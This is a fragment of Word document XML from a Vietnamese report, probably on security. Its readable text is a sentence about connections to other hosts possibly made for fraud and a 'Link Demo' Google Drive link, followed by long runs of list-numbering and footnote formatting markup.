          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">tiến hành </w:t>
      </w:r>
      <w:r w:rsidR="00C23984" w:rsidRPr="00E6744B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>connect đến các trang web, các host khác</w:t>
      </w:r>
      <w:r w:rsidR="00EF0C93" w:rsidRPr="00E6744B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>, có khả năng nhằm mục đích lừa đảo</w:t>
      </w:r>
      <w:r w:rsidR="001D3E83" w:rsidRPr="00E6744B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26095C9E" w14:textId="77777777" w:rsidR="00C17580" w:rsidRDefault="00581CF6" w:rsidP="00C17580">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="25" w:name="_Toc152795847"/>
      <w:r w:rsidRPr="00C17580">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Link Demo:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="25"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0583796D" w14:textId="5420F322" w:rsidR="00E6744B" w:rsidRDefault="00C17580" w:rsidP="00C17580">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId95" w:history="1">
        <w:r w:rsidRPr="00EA78F0">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>https://drive.google.com/drive/folders/1QXLydxB4O6iZwQqFJndQaO3FAygRIOzr?usp=sharing</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="464EA570" w14:textId="77777777" w:rsidR="00C17580" w:rsidRPr="00C17580" w:rsidRDefault="00C17580" w:rsidP="00C17580">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="457BBDF3" w14:textId="77777777" w:rsidR="00B06D99" w:rsidRPr="001502A5" w:rsidRDefault="00B06D99" w:rsidP="00B711B0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00B06D99" w:rsidRPr="001502A5" w:rsidSect="00E31ADF">
      <w:pgSz w:w="12240" w:h="15840"/>
      <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="720" w:footer="720" w:gutter="0"/>
      <w:pgBorders w:display="firstPage"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DAFC" w14:textId="77777777" w:rsidR="00155C99" w:rsidRDefault="00155C99" w:rsidP="00E31ADF">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="5325C91B" w14:textId="77777777" w:rsidR="00155C99" w:rsidRDefault="00155C99" w:rsidP="00E31ADF">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:continuationSeparator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationNotice" w:id="1">
    <w:p w14:paraId="16739E32" w14:textId="77777777" w:rsidR="00155C99" w:rsidRDefault="00155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EF8D" w14:textId="77777777" w:rsidR="00155C99" w:rsidRDefault="00155C99" w:rsidP="00E31ADF">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="7C4F5F45" w14:textId="77777777" w:rsidR="00155C99" w:rsidRDefault="00155C99" w:rsidP="00E31ADF">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:continuationSeparator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationNotice" w:id="1">
    <w:p w14:paraId="7FED23D8" w14:textId="77777777" w:rsidR="00155C99" w:rsidRDefault="00155C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7D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="45C051D2"/>
    <w:lvl w:ilvl="0" w:tplc="42D0A97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A27B5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="044ACBAC"/>
    <w:lvl w:ilvl="0" w:tplc="42AC0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C20D9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7C70382E"/>
    <w:lvl w:ilvl="0" w:tplc="D0B2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B953C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A5A438C4"/>
    <w:lvl w:ilvl="0" w:tplc="04090003">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1080" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="7B9685FC">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1800" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="881E6EA0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2520" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="7E1A0CA8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3240" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="0400EEDE">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3960" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="5D78274C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4680" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="EAF418EE">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5400" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="CD40BE2C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6120" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="2504932E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6840" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="4" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="22781706"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EE48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474F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="65281708"/>
    <w:lvl w:ilvl="0" w:tplc="EA24263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1E3ED"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="4716A62E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="-"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="C4904366">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="20B8B754">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="CA0CBC1E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="7F823244">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="C714C558">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="6FA4535E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="B4362956">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="397CB552">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="7" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="333C4091"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A58EAF4C"/>
    <w:lvl w:ilvl="0" w:tplc="9564B55E">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorHAnsi"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618C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="0346E8B6">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="-"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="2C96BF66">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="1EA4EBA0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="EDDA7A92">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="AA1C9FFC">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="36747D4E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="8A9AB906">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="BE1CBF6C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="0F1C26A2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="9" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="361F0599"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="84F88758"/>
    <w:lvl w:ilvl="0" w:tplc="91225F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9A56E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="86AE47AA">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="-"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="D880213A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="F0C4205C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="D9D4191A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="73223B38">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="37E0D446">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="FA7276E6">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="FB0EFA76">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="1E88CA50">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="11" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="3FAB511B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="A5F424D0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="-"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="B53C598E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="3662DBA6">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="0BAE978C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="41B8817C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="F84638FE">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="D56AC2D6">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="27C4CEF2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="D250F36A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="12" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="418B6247"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="67F22D42"/>
    <w:lvl w:ilvl="0" w:tplc="AE9880B8">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%1)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="DD242BC6">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="B4B2B472">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="2D36D980">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="94424F88">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="7966CCAE">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="CAC45D28">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="1DF6EFAC">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="2B745976">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
